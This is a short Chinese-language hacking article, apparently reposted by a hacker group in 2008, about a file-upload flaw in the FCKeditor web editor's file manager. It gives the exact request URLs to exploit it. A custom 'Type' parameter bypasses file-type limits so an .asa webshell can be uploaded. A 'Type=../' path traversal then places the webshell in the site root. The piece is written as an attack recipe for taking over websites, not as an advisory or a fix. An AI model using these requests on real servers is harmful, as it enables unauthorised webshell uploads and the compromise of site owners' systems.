fckeditor网页编辑器的漏洞

www.hx99.org 阅读: 时间:2008-03-07 整理:华西黑盟
------------------------------------------------------------------

 

来源：安全中国

http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:

http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp

所传的文件就到了 http://www.xxx.tw/UserFiles/cnandbao/下了经过进一步的考虑,如果这样输入:http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp就可以传到网站的根目录下,这样只要网站支持什么脚本,你传什么脚本的马就可以了.所传的文件就到了网站根目录下了

【免费加入会员】【我要投稿】【关闭本页】